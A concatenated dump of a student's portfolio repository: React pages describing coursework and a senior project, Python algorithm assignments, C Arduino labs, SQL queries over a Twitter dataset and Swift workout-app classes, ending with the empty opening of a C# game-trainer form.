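      for (const k of keys) {
        if (!node.children.has(k)) node.children.set(k, new TreeNode(k));
        node = node.children.get(k);
      }
    }

    // True if the whole key sequence exists as a path from the root.
    contains(keys) {
      let node = this.root;
      for (const k of keys) {
        if (!node.children.has(k)) return false;
        node = node.children.get(k);
      }
      return true;
    }

    // Longest leading portion of the key sequence that is present in the tree.
    prefix(keys) {
      const found = [];
      let node = this.root;
      for (const k of keys) {
        if (!node.children.has(k)) break;
        node = node.children.get(k);
        found.push(k);
      }
      return found;
    }
  }
*/}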
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>EntryTree.java (click on image to download file)</Title>
<a href={EntryTree} download="EntryTree.java">
<img width='100%' src={EntryTreeSS1} alt=''/>
<img width='100%' src={EntryTreeSS2} alt=''/>
<img width='100%' src={EntryTreeSS3} alt=''/>
<img width='100%' src={EntryTreeSS4} alt=''/>
</a>
<Title level={4}>Dictionary.java (click on image to download file)</Title>
<a href={DictionaryJava} download="Dictionary.java">
<img width='100%' src={DictionaryPNG} alt=''/>
</a>
<Title level={4}>Output of Dictionary.java</Title>
<img width='100%' src={output1} alt=''/>
<img width='100%' src={output2} alt=''/>
<img width='100%' src={output3} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/SeniorProject/SeniorProject.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import Presentation from './Final Presentation.pdf';
import UI from './UI.png';
const Title = Typography.Title;
export default class SeniorProject extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Microbiology Data Entry App - Senior Project</Title>
<Title level={4}>Technology: Python, Plotly, Pandas, PyQt5</Title>
For senior projects at Iowa State, students are put into groups of four to six and spend two
semesters working on a real-world project. In my case, I was on a team of six, and we made a
desktop graphing application for Iowa
State's microbiology department. Our app allows scientists to import Excel data about their experiments
and view a variety of graphs based on the data. We used Python to write the app and Python
libraries like Plotly to make customized graphs, Pandas to import and manage the data, PyQt5 for UI
construction, and Python's Pickle module for storing data locally.
<a href={Presentation} download="Presentation.pdf"> Click here to download our final Presentation.</a>
<a href="https://docs.google.com/file/d/124qSnbh09i01BNGcJzjEYOeTo_q1gbfD/preview" target="_blank" rel="noopener noreferrer"> Click here to view our demo video.</a>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<br></br>
<img width='100%' src={UI} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS311/Project2/q5.py
def line_edits(s1, s2):
"""function for generating the descriptions of line edits"""
l1 = s1.splitlines()
l2 = s2.splitlines()
result = editDistance(l1, l2)
result = result[::-1]
return result
def editDistance(l1, l2):
"""Helper function to generate the table for line edits"""
cache = [[None for i in range(len(l2) + 1)] for j in range(len(l1) + 1)]
for row in range(len(l1) + 1):
for col in range(len(l2) + 1):
if row == 0 and col == 0:
cache[row][col] = 0
elif col == 0:
cache[row][col] = row
elif row == 0:
cache[row][col] = col
elif l1[row - 1] == l2[col - 1]:
cache[row][col] = cache[row - 1][col - 1]
else:
a = cache[row - 1][col]
b = cache[row][col - 1]
c = cache[row - 1][col - 1]
cache[row][col] = min(a, b, c) + 1
return findResult(l1, l2, cache)
def findResult(l1, l2, table):
"""Helper function to find the result after the table has been built"""
rowH = len(l1)
colH = len(l2)
resultH = []
while rowH != 0 or colH != 0:
if colH == 0:
action = ('D', l1[rowH - 1], "")
resultH.append(action)
rowH = rowH - 1
elif rowH == 0:
action = ('I', "", l2[colH - 1])
resultH.append(action)
colH = colH - 1
elif l1[rowH - 1] == l2[colH - 1]:
action = ('T', l1[rowH - 1], l2[colH - 1])
resultH.append(action)
rowH = rowH - 1
colH = colH - 1
else:
rowH, colH, resultH = otherHelper(table, (l1, l2), rowH, colH, resultH)
return resultH
def otherHelper(table, l, rowH, colH, resultH):
"""helper method to shorten the above function"""
l1 = l[0]
l2 = l[1]
delete = table[rowH - 1][colH]
insert = table[rowH][colH - 1]
sub = table[rowH - 1][colH - 1]
if delete <= insert and delete <= sub:
action = ('D', l1[rowH - 1], "")
resultH.append(action)
rowH = rowH - 1
elif insert < delete and insert <= sub:
action = ('I', "", l2[colH - 1])
resultH.append(action)
colH = colH - 1
elif sub < delete and sub < insert:
lcs = longest_common_substring(l1[rowH - 1], l2[colH - 1])
action = ('S', findDiff(lcs, l1[rowH - 1]), findDiff(lcs, l2[colH - 1]))
resultH.append(action)
rowH = rowH - 1
colH = colH - 1
return rowH, colH, resultH
def findDiff(lcs, s):
"""function for finding the difference between the lcs and s"""
count = 0
extra = []
result = ""
for c in s:
if len(lcs) != 0 and lcs[0] == c:
lcs = lcs[1:]
else:
extra.append(count)
count += 1
realPosition = 0
for x in extra:
x += realPosition
before = s[:x]
after = s[x + 1:]
s = before + "[[" + s[x] + "]]" + after
realPosition += 4
return s
def longest_common_substring(s1, s2):
"""function for finding the LCS through recurison"""
cache = [[None for i in range(len(s2) + 1)] for j in range(len(s1) + 1)]
def recurse(s1, s2):
"""recursive helper function"""
if len(s1) == 0 or len(s2) == 0:
return ""
else:
a = s1[len(s1) - 1]
b = s2[len(s2) - 1]
if a == b:
if cache[len(s1)][len(s2)] != None:
return cache[len(s1)][len(s2)]
else:
s = recurse(s1[:len(s1) - 1], s2[:len(s2) - 1])
s = s + a
cache[len(s1)][len(s2)] = s
return s
if a != b:
one = None
two = None
if cache[len(s1) - 1][len(s2)] != None:
one = cache[len(s1) - 1][len(s2)]
else:
one = recurse(s1[:len(s1) - 1], s2)
cache[len(s1) - 1][len(s2)] = one
if cache[len(s1)][len(s2) - 1] != None:
two = cache[len(s1)][len(s2) - 1]
else:
two = recurse(s1, s2[:len(s2) - 1])
cache[len(s1)][len(s2) - 1] = two
if len(one) >= len(two): return one
elif len(two) > len(one): return two
return recurse(s1, s2)
s1 = "Line1\nLine2\nLine3\nLine4\n"
s2 = "Line1\nLine3\nLine4\nLine5\n"
s3 = "Line1\nLine2\nLine3\nLine4\n"
s4 = "Line5\nLine4\nLine3\n"
s5 = "Line1\n"
s6 = ""
s7 = "Line1\nLine 2a\nLine3\nLine4\n"
s8 = "Line5\nline2\nLine3\n"
table = line_edits(s7, s8)
for row in table:
print(row)<file_sep>/src/ClassComponents/CPRE288/CPRE288.js
import React from 'react';
import { Layout, Menu, Breadcrumb } from 'antd';
import { MenuOutlined, HomeOutlined } from '@ant-design/icons';
import '../../Components/HomePage/HomePage.css';
import { Redirect } from 'react-router-dom';
import FinalProject from './FinalProject/FinalProject.js';
import Lab5 from './Lab5/Lab5.js';
import Lab6 from './Lab6/Lab6.js';
const { Header, Content, Sider } = Layout;
export default class CPRE288 extends React.Component {
state = {
collapsed: false,
currentPage: "FinalProject"
}
onCollapse = collapsed => {
this.setState({ collapsed });
};
handleHomeClick = () => {
this.setState({
currentPage: "Home"
});
}
handleFinalProjectClick = () => {
this.setState({
currentPage: "FinalProject"
});
}
handleLab5Click = () => {
this.setState({
currentPage: "Lab5"
});
}
handleLab6Click = () => {
this.setState({
currentPage: "Lab6"
});
}
render() {
let page;
let width;
let pathItem1 = "default";
let pathItem2 = "default";
if (this.state.currentPage === "Home") {
return <Redirect to={"/Home"}/>
}
else if (this.state.currentPage === "FinalProject") {
page = <FinalProject/>
}
else if (this.state.currentPage === "Lab5") {
page = <Lab5/>
}
else if (this.state.currentPage === "Lab6") {
page = <Lab6/>
}
if (this.props.location.state.path === "Categories/LowLevel") {
pathItem1 = "Categories"
pathItem2 = "Low Level"
}
else if (this.props.location.state.path === "Years/Sophomore") {
pathItem1 = "Years"
pathItem2 = "Sophomore"
}
if (this.state.collapsed === true) {
width = 80;
}
else {
width = 400;
}
return (
<Layout style={{ minHeight: '100vh' }}>
<Sider
collapsible
collapsed={this.state.collapsed}
onCollapse={this.onCollapse}
breakpoint="xl"
width="400"
style={{
overflow: 'auto',
position: 'fixed',
height: '100vh',
left: 0,
}}
>
{this.state.collapsed===true ?
<div className="logo-collapsed">
BA
</div>
:
<div className="logo-expanded">
<NAME>
</div>
}
<Menu theme="dark" defaultSelectedKeys={['1']} mode="inline">
<Menu.Item key="7" icon={<HomeOutlined/>} onClick={this.handleHomeClick}>
Home
</Menu.Item>
<Menu.Divider/>
<Menu.Item key="1" icon={<MenuOutlined/>} onClick={this.handleFinalProjectClick}>
Java GUI - Final Project
</Menu.Item>
<Menu.Item key="2" icon={<MenuOutlined/>} onClick={this.handleLab5Click}>
Implementing WiFi Connectivity - Lab 5
</Menu.Item>
<Menu.Item key="3" icon={<MenuOutlined/>} onClick={this.handleLab6Click}>
Analog to Digital Converter - Lab 6
</Menu.Item>
</Menu>
</Sider>
<Layout className="site-layout" style={{marginLeft:width}}>
<Header className="site-layout-background" style={{ padding: 0 }}/>
<Content style={{ margin: '0 16px' }}>
{this.state.currentPage === "FinalProject" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Embedded Systems - CPRE 288</Breadcrumb.Item>
<Breadcrumb.Item>Java GUI - Final Project</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "Lab5" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Embedded Systems - CPRE 288</Breadcrumb.Item>
<Breadcrumb.Item>Implementing WiFi Connectivity - Lab 5</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "Lab6" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Embedded Systems - CPRE 288</Breadcrumb.Item>
<Breadcrumb.Item>Analog to Digital Converter - Lab 6</Breadcrumb.Item>
</Breadcrumb>
}
<div className="site-layout-background" style={{ padding: 24, minHeight: 360 }}>
{page}
</div>
</Content>
</Layout>
</Layout>
);
}
}<file_sep>/src/Components/ComS363/querySolutions.sql
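-- Query solutions for the ComS363 course project, run against a Twitter
-- dataset. Q1-Q11 use the tweet / hashtag / userAccount tables; the later
-- queries (Q15, Q18, Q23) target a variant schema with tweets / user /
-- url / mentioned tables. Each query is labeled with its question number.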
-- Q1
select t.retweet_count, t.textbody, t.screen_name, u.category, u.sub_category from tweet t, userAccount u where
t.screen_name = u.screen_name
and t.year = 2016 and t.month = 1
order by t.retweet_count desc limit 10;
-- Q3
select distinct h.hname, count(distinct u.state) as num_states, group_concat(distinct u.state) as states
from tweet t, hashtag h, userAccount u where
h.h_tid = t.tid and t.screen_name = u.screen_name and u.state != "na" and SUBSTRING(t.posted, 1, 4) = 2016
group by h.hname order by num_states desc limit 10;
-- Q6
select x.screen_name, x.state from (select distinct u.screen_name, u.state, u.numFollowers from userAccount u, hashtag h, tweet t where
h.h_tid = t.tid and t.screen_name = u.screen_name and h.hname in ("HappyNewYear","NewYear","NewYears","NewYearsDay")) x
order by x.numFollowers desc limit 10;
-- Q9
SELECT DISTINCT u.screen_name, u.category, u.numFollowers
FROM userAccount u
WHERE u.sub_category = 'GOP'
ORDER BY u.numFollowers DESC
LIMIT 10;
-- Q10
select distinct h.hname, u.state from hashtag h, userAccount u, tweet t where
h.h_tid = t.tid and t.screen_name = u.screen_name and u.state in ("Ohio", "Alaska", "Alabama")
and t.month = 1 and t.year = 2016 order by h.hname asc;
-- Q11
select t.textbody, h.hname, u.screen_name, u.sub_category from tweet t, hashtag h, userAccount u
where h.h_tid = t.tid and t.screen_name = u.screen_name and u.state = 'Ohio' and h.hname = 'Ohio'
and (u.sub_category = "GOP" or u.sub_category = "democrat") and t.month = 1 AND t.year = 2016 limit 10;
-- Q15
SELECT u.screen_name, u.ofstate, GROUP_CONCAT(url.url) Listof_urls
FROM user u, tweets t, url
WHERE u.screen_name = t.posting_user AND url.tid = t.tid AND MONTH(t.posted) = '01' AND YEAR(t.posted) = '2016'AND sub_category = 'GOP'
GROUP BY u.screen_name, u.ofstate limit 100;
-- Q18
select user.screen_name, user.ofstate, group_concat(distinct tweets.posting_user order by tweets.posting_user asc separator ',') as postingUsers
from user
join mentioned on user.screen_name= mentioned.screen_name
join tweets on tweets.tid= mentioned.tid
join user as u on u.screen_name = tweets.posting_user
where u.sub_category= "GOP"
and month(tweets.posted)='01'
and year(tweets.posted) = '2016'
group by user.screen_name, user.ofstate
order by count(tweets.posting_user) desc limit 10;
-- Q23
SELECT DISTINCT h.hastagname, COUNT(h.hastagname) AS cnt
FROM hashtag h
INNER JOIN tweets t ON h.tid = t.tid
INNER JOIN user u ON t.posting_user = u.screen_name
WHERE u.sub_category = 'GOP' and YEAR(t.posted) = '2016' AND MONTH(t.posted) IN ('01','02','03')
GROUP BY h.hastagname
ORDER BY cnt DESC
LIMIT 10;
<file_sep>/src/ClassComponents/ComS311/Project2/q2.py
def longest_common_substring(s1, s2):
"""function to find LCS with loops"""
table = []
count = 0
while count <= len(s1):
count2 = 0
t = []
while count2 <= len(s2):
t.append(None)
count2 += 1
table.append(t)
count += 1
for row in range(len(table)):
for col in range(len(table[row])):
if row == 0 or col == 0:
table[row][col] = 0
elif s1[row - 1] == s2[col - 1]:
table[row][col] = table[row - 1][col - 1] + 1
elif s1[row - 1] != s2[col - 1]:
m = max(table[row][col - 1], table[row - 1][col])
table[row][col] = m
result = findResult(s1, s2, table)
return result
def findResult(s1, s2, table):
"""function that finds result after table is generated"""
result = ""
n = len(s1)
m = len(s2)
while n != 0 and m != 0:
if s1[n - 1] == s2[m - 1]:
result += s1[n - 1]
n = n - 1
m = m - 1
elif s1[n - 1] != s2[m - 1]:
a = table[n - 1][m]
b = table[n][m - 1]
if max(a, b) == a and n != 0:
n = n - 1
elif max(a, b) == b and m != 0:
m = m - 1
result = result[::-1]
return result
s1 = "Look at me, I can fly!"
s2 = "Look at that, it's a fly"
s3 = "abcdefghijklmnopqrstuvwxyz"
s4 = "ABCDEFGHIJKLMNOPQRSTUVWXYS"
s5 = "balderdash!"
s6 = "balderdash!"
s7 = 1500 * 'x'
s8 = 1500 * 'y'
s9 = "them"
s10 = "tim"
s11 = "xyxxzx"
s12 = "zxzyyzxx"
print(longest_common_substring(s7, s8))<file_sep>/src/ClassComponents/CPRE185/Lab7/lab7.c
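/*
 * CPRE 185 Lab 7: reads comma-separated Arduino Esplora samples from stdin
 * (accelerometer x/y/z plus button states), converts the x and y readings
 * into roll and pitch angles with asin(), scales the angle to the width of
 * the text display, and prints a horizontal bar graph of 'R' or 'L'
 * characters around the center column. The LEFT button switches to graphing
 * roll, RIGHT switches to pitch, and DOWN exits the program.
 */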
#include <stdio.h>
#include <math.h>
#define PI 3.141592653589
int scaleRadsForScreen(double rad);
double pitch(double y_mag);
double roll(double x_mag);
int read_acc(double* a_x, double* a_y, double* a_z, int* Button_UP, int* Button_DOWN, int* Button_LEFT, int* Button_RIGHT);
void print_chars(int num, char use);
void graph_line(int number);
int read_acc(double* a_x, double* a_y, double* a_z, int* Button_UP, int* Button_DOWN, int* Button_LEFT, int* Button_RIGHT){
int Button_5;
double slide;
scanf("%lf, %lf, %lf, %d, %d, %d, %d, %d, %lf", a_x, a_y, a_z, Button_UP, Button_DOWN, Button_LEFT, Button_RIGHT, &Button_5, &slide);
return *Button_LEFT;
}
double roll(double x_mag){
double radians;
if (x_mag >= 1){
x_mag = 1;
}
if (x_mag <= -1){
x_mag = -1;
}
radians = asin(x_mag);
return radians;
}
double pitch(double y_mag){
double radians;
if (y_mag >= 1){
y_mag = 1;
}
if (y_mag <= -1){
y_mag = -1;
}
radians = asin(y_mag);
return radians;
}
int scaleRadsForScreen(double rad){
int screenVal;
screenVal = rad * (78 / PI);
return screenVal;
}
void print_chars(int num, char use){
int i;
for (i = 0; i < num; ++i){
printf("%c", use);
}
return;
}
void graph_line(int number){
int spaces;
if (number >= 0){
print_chars(40, ' ');
print_chars(number, 'R');
print_chars(1, '\n');
}
if (number < 0){
spaces = 40 + number;
print_chars(spaces, ' ');
print_chars(fabs(number), 'L');
print_chars(1, '\n');
}
return;
}
int main(){
double x, y, z;
int b_Up, b_Down, b_Left, b_Right;
double roll_rad, pitch_rad;
int scaled_value;
int value = 0;
int value2 = 0;
while(1){
read_acc(&x, &y, &z, &b_Up, &b_Down, &b_Left, &b_Right);
roll_rad = roll(x);
pitch_rad = pitch(y);
if (b_Left == 1){
value = 1;
value2 = 0;
}
if (value == 1){
scaled_value = scaleRadsForScreen(roll_rad);
graph_line(scaled_value);
}
read_acc(&x, &y, &z, &b_Up, &b_Down, &b_Left, &b_Right);
if (b_Right == 1){
value2 = 1;
value = 0;
}
if (value2 == 1){
scaled_value = scaleRadsForScreen(pitch_rad);
graph_line(scaled_value);
}
if (b_Down == 1){
return 0;
}
fflush(stdout);
}
}<file_sep>/src/ClassComponents/ComS311/Project1/q3.py
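"""
ComS311 Project 1, Q3: ordering computations that depend on one another.

The input is a directed-graph description of the form "D <n>" followed by
one "u v" pair per line. computation_order() builds an adjacency list,
runs a depth-first topological sort, and returns an ordering in which
every vertex appears after the vertices it points to, or None if the
dependencies contain a cycle (detected when the DFS reaches a vertex that
is still on the current path).
"""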
from collections import deque
def computation_order(dependencies):
adj_list = adjacency_list(dependencies)
result = None
try: topological_sort(adj_list)
except ValueError: return result
return topological_sort(adj_list)
def topological_sort(graph):
order, enter, state = deque(), set(graph), {}
def dfs(node):
state[node] = 0
for k in graph.get(node, ()):
sk = state.get(k, None)
if sk == 0: raise ValueError(None)
if sk == 1: continue
enter.discard(k)
dfs(k)
order.appendleft(node)
state[node] = 1
while enter: dfs(enter.pop())
sort = []
for x in range(len(order)):
sort.append(order[len(order) - 1 - x])
return sort
def adjacency_list(graph_str):
l = graph_str.splitlines()
edges = l[1:len(l)]
vertices = int(l[0].split()[1])
adj = []
for x in range(vertices):
nodeList = []
for y in range(len(edges)):
if int(edges[y].split()[0]) == x:
str = edges[y]
edge = int(str.split()[1])
nodeList.append(edge)
adj.append(nodeList)
adj_dict = {}
for x in range(len(adj)):
adj_dict.update({x:adj[x]})
return adj_dict
str1 = "D 5\n0 3\n3 1\n1 4\n4 2"
str2 = "D 2\n0 1"
str3 = "D 3\n1 2\n0 2"
str4 = "D 3"
str5 = "D 5\n2 3\n3 2"
print(computation_order(str5))
import React from 'react';
import { Typography, Row, Col } from 'antd';
import finalProjectGP1 from './finalProjectGP1.png';
import finalProjectGP2 from './finalProjectGP2.png';
import finalProjectGUIMain from './finalProjectGUIMain.png';
import Graph from './Graph.png';
import GraphPanel from './GraphPanel.java';
import GuiMain from './GuiMain.java';
const Title = Typography.Title;
export default class FinalProject extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Java GUI - Final Project</Title>
<Title level={4}>Technology: Java, C, Eclipse</Title>
For this project, I was on a team with three other students. We were tasked with programming a robot,
using embedded systems techniques, so that it could be controlled remotely over a WiFi connection
between the robot and a lab computer. We then had to navigate it around an obstacle course to a final
destination without directly seeing the robot. My responsibility was to create a Java program that
took the data from the robot's distance sensors and displayed it in a radial graph to detect objects.
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>
This graph is made from test data and shows two objects in front of the robot. The red line represents data from
the ultrasonic sensor and the blue line (under the red line) represents data from the infrared sensor
</Title>
<img width='100%' src={Graph} alt=''/>
<Title level={4}>GuiMain.java (click on image to download file)</Title>
<a href={GuiMain} download="GUIMain.java">
<img width='100%' src={finalProjectGUIMain} alt=''/>
</a>
<Title level={4}>GraphPanel.java (click on image to download file)</Title>
<a href={GraphPanel} download="GraphPanel.java">
<img width='100%' src={finalProjectGP1} alt=''/>
<img width='100%' src={finalProjectGP2} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/CPRE185/Lab8/Lab8.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import G3shortlong from './G3shortlong.PNG';
import lab8C from './lab8.c';
import ProjectFiles from './Lab8.zip';
import lab8SS1 from './lab8SS1.png';
import lab8SS2 from './lab8SS2.png';
const Title = Typography.Title;
export default class Lab8 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Moving Averages with Accelerometer - Lab 8</Title>
<Title level={4}>Technology: C, Arduino Esplora</Title>
For this lab, we had to print a moving average of the Arduino Esplora's accelerometer
values. The program also outputs the maximum and minimum values in the buffer array.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>lab8.c (click on image to download file)</Title>
<a href={lab8C} download="lab8.c">
<img width='100%' src={lab8SS1} alt=''/>
<img width='100%' src={lab8SS2} alt=''/>
</a>
<Title level={4}>
Example Output (You can see how the data is "smoothed" out with the moving averages):<br></br>
Y-axis = accelerometer data in g's<br></br>
X-axis = time in milliseconds
</Title>
<img width='100%' src={G3shortlong} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS227/A2/FootballGameTest.java
package hw2;
import hw2.FootballGame;
public class FootballGameTest {
public static void main(String[] args){
FootballGame game = new FootballGame();
game.runOrPass(1);
game.runOrPass(80);
game.runOrPass(1);
game.runOrPass(10);
game.runOrPass(5);
System.out.println(game.getOffense());
System.out.println(game.getScore(0));
System.out.println(game.getScore(1));
System.out.println(game.getDown());
}
}
<file_sep>/src/Components/WorkoutTracker/DetailsViewController.swift
//
// DetailsViewController.swift
// WorkoutTracker
//
// Created by <NAME> on 1/23/20.
// Copyright © 2020 <NAME>. All rights reserved.
//
import UIKit
class DetailsViewController: UIViewController, UITableViewDelegate, UITableViewDataSource {
var list: [String] = []
override func viewDidLoad() {
super.viewDidLoad()
let exercises = Variables.exercises
let sets = Variables.sets
//Loops through the exercises (0..< avoids a crash when the list is empty)
for i in 0..<exercises!.count {
var eStr = exercises![i]["name"].string! + "\n\n"
let outerEID = exercises![i]["e_id"].intValue
//Loops through the sets and finds those belonging to the current exercise
//(0..< avoids a crash when there are no sets)
for j in 0..<sets!.count {
let currentSet = sets![j]
// Found relevant exercise
if currentSet["e_id"].intValue == outerEID {
eStr += "Set " + String(currentSet["orderNum"].intValue) + ":\n"
eStr += " Reps: " + String(currentSet["reps"].intValue)
eStr += " Weight: " + String(currentSet["weight"].intValue) + "\n"
}
}
list.append(eStr)
}
}
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return(list.count)
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
let cell = tableView.dequeueReusableCell(withIdentifier: "DetailsTableViewCell", for: indexPath) as? DetailsTableViewCell
cell!.testLabel.text = list[list.count - indexPath.row - 1]
tableView.rowHeight = UITableView.automaticDimension
tableView.estimatedRowHeight = 600
return cell!
}
}
<file_sep>/src/Components/WorkoutApp/Exercise.swift
//
// File.swift
// workoutApp
//
// Created by <NAME> on 1/7/19.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
class Exercise {
private var name: String
private var reps: [Int] = []
private var weight: [Int] = []
init?(name: String, reps: [Int], weight: [Int]){
if name == ""{
return nil
}
self.name = name
self.reps = reps
self.weight = weight
}
func showName() -> String {
return name
}
func showReps() -> [Int] {
return reps
}
func showWeight() -> [Int] {
return weight
}
}
<file_sep>/src/ClassComponents/CPRE185/Lab9/lab9.c
// WII-MAZE Skeleton code written by <NAME> 2007
// Edited for ncurses 2008 <NAME>
//Updated for Esplora 2013 TeamRursch185
// Headers
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <ncurses/ncurses.h>
#include <unistd.h>
#include <time.h>
// Mathematical constants
#define PI 3.14159
// Screen geometry
// Use ROWS and COLUMNS for the screen height and width (set by system)
// MAXIMUMS
#define COLUMNS 100
#define ROWS 80
// Character definitions taken from the ASCII table
#define AVATAR 'A'
#define WALL '*'
#define EMPTY_SPACE ' '
// Number of samples taken to form an average for the accelerometer data
// Feel free to tweak this. You may actually want to use the moving averages
// code you created last week
#define NUM_SAMPLES 10
// PRE: 0 < x < COLUMNS, 0 < y < ROWS, 0 < use < 255
// POST: Draws character use to the screen and position x,y
void draw_character(int x, int y, char use);
// 2D character array which the maze is mapped into
char MAZE[COLUMNS][ROWS];
// POST: Generates a random maze structure into MAZE[][]
//You will want to use the rand() function and maybe use the output %100.
//You will have to use the argument to the command line to determine how
//difficult the maze is (how many maze characters are on the screen).
void generate_maze(int difficulty);
void generate_maze(int difficulty){
int i, a, num;
for(i = 0; i < COLUMNS; ++i){
for(a = 0; a < ROWS; ++a){
num = rand() % 100;
if (num < difficulty){
MAZE[i][a] = WALL;
}
else{
MAZE[i][a] = EMPTY_SPACE;
}
}
}
}
// PRE: MAZE[][] has been initialized by generate_maze()
// POST: Draws the maze to the screen
void draw_maze(void);
void draw_maze(void){
char character;
int i, a;
for(i = 0; i < COLUMNS; ++i){
for(a = 0; a < ROWS; ++a){
character = MAZE[i][a];
draw_character(i, a, character);
}
}
}
// PRE: -1.0 < y_mag < 1.0
// POST: Returns tilt magnitude scaled to -1.0 -> 1.0
// You may want to reuse the pitch function written in previous labs.
float calc_roll(float x_mag);
float calc_roll(float x_mag){
if (x_mag >= 1){
x_mag = 1;
}
if (x_mag <= -1){
x_mag = -1;
}
return x_mag;
}
// Main - Run with './explore.exe -t -a -b' piped into STDIN
int main(int argc, char* argv[])
{
int t;
int difficulty = 0;
int i, a;
int y = 0;
int n = 0;
char previous;
float ax, ay, az;
int x = 50;
int previousT = 0;
srand(time(NULL));
sscanf(argv[1], "%d", &difficulty);
// setup screen
initscr();
refresh();
generate_maze(difficulty);
draw_maze();
draw_character(50, 0, AVATAR);
while(y < 79){
scanf("%d, %f, %f, %f", &t, &ax, &ay, &az);
ax = calc_roll(ax);
if ((t - previousT) > 100){
previousT = t;
if (y <= 0){
draw_character(50, 0, EMPTY_SPACE);
}
else{
previous = MAZE[50][y - 1];
draw_character(50, (y - 1), previous);
}
draw_character(50, y, AVATAR);
++y;
}
/*
if ((t % 200) <= 2){
if (MAZE[x][y + 1] == ' '){
++y;
draw_character(x, y, AVATAR);
if (y <= 0){
draw_character(50, 0, EMPTY_SPACE);
}
else{
draw_character(x, (y - 1), EMPTY_SPACE);
}
}
if ((MAZE[x + 1][y] == ' ') && (ax > .3)){
++x;
draw_character(x, y, AVATAR);
draw_character((x - 1), y, ' ');
}
if ((MAZE[x - 1][y] == ' ') && (ax < -.3)){
--x;
draw_character(x, y, AVATAR);
draw_character((x + 1), y, ' ');
}
}
*/
}
printf("\n");
printf("\nYOU WIN!\n");
while(1);
}
// PRE: 0 < x < COLUMNS, 0 < y < ROWS, 0 < use < 255
// POST: Draws character use to the screen and position x,y
//THIS CODE FUNCTIONS FOR PLACING THE AVATAR AS PROVIDED.
//YOU DO NOT NEED TO CHANGE THIS FUNCTION.
void draw_character(int x, int y, char use)
{
mvaddch(y,x,use);
refresh();
}
<file_sep>/src/ClassComponents/ComS311/Project1/q5.py
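"""
ComS311 Project 1, Q5: worst-case round-trip energy from a depot.

maximum_energy() parses a weighted undirected graph (a "U <n> W" header
followed by "u v w" edges), runs Dijkstra's algorithm from the depot, and
returns twice the largest finite shortest-path distance, i.e. the energy
needed for a round trip to the farthest reachable vertex. Unreachable
vertices (distance infinity) are ignored, and an isolated depot yields 0.
"""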
def maximum_energy(city_map, depot_position):
adj = adj_list(city_map)
for x in range(len(adj)):
if adj[x] == [] and x == depot_position:
return 0
distance = dijkstra(adj, depot_position)
largest = 0
for x in distance:
if x > largest and x != float('inf'):
largest = x
return largest * 2
def dijkstra(adj_list, start):
n = len(adj_list)
in_tree = []
distance = []
parent = []
for x in range(n):
in_tree.append(False)
distance.append(float('inf'))
parent.append(None)
distance[start] = 0
while all(in_tree) == False:
u = next_vertex(in_tree, distance)
in_tree[u] = True
for v, weight in adj_list[u]:
if (not in_tree[v]) and (distance[u] + weight < distance[v]):
distance[v] = distance[u] + weight
parent[v] = u
return distance
def next_vertex(in_tree, distance):
false_indexes = []
count = 0
for x in in_tree:
if x == False:
false_indexes.append(count)
count += 1
smallest = distance[false_indexes[0]]
smallest_index = false_indexes[0]
for x in false_indexes:
current = distance[x]
if current < smallest:
smallest = current
smallest_index = x
return smallest_index
def adj_list(graph):
l = graph.splitlines()
edges = l[1:len(l)]
vertices = int(l[0].split()[1])
adj = []
for x in range(vertices):
nodeList = []
for y in range(len(edges)):
data = edges[y].split()
if int(data[0]) == x:
edge = (int(data[1]), int(data[2]))
nodeList.append(edge)
if int(data[1]) == x:
edge = (int(data[0]), int(data[2]))
nodeList.append(edge)
adj.append(nodeList)
return adj
str1 = "U 4 W\n0 2 5\n0 3 2\n3 2 2"
str2 = "U 5 W\n0 1 1\n0 3 3\n1 3 4\n1 4 1\n1 2 2\n4 3 2\n4 2 3"
str3 = "U 7 W\n0 1 6\n1 2 6\n0 2 10\n0 3 3\n3 4 3\n4 5 1"
print(maximum_energy(str3, 0))
| 7b25953f5459bcaec392b5af5ca381f84faa13fb | ["SQL", "JavaScript", "Swift", "Java", "Python", "C"] | 75 | JavaScript | balex654/Portfolio | d3f88f17f007621fb8efe90ee83d1924032fda8d | 3f0baba700f76320e90fcf91ec2316081c902be0 | refs/heads/master |
<repo_name>mikeatlantis/Little-inferno-Trainer-Source-code<file_sep>/README.md
# Little-inferno-Trainer-Source-code<file_sep>/Little Inferno.cs
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using Memory;
namespace DataBase
{
public partial class Form2 : MetroFramework.Forms.MetroForm
{
public Form2()
{
InitializeComponent();
}
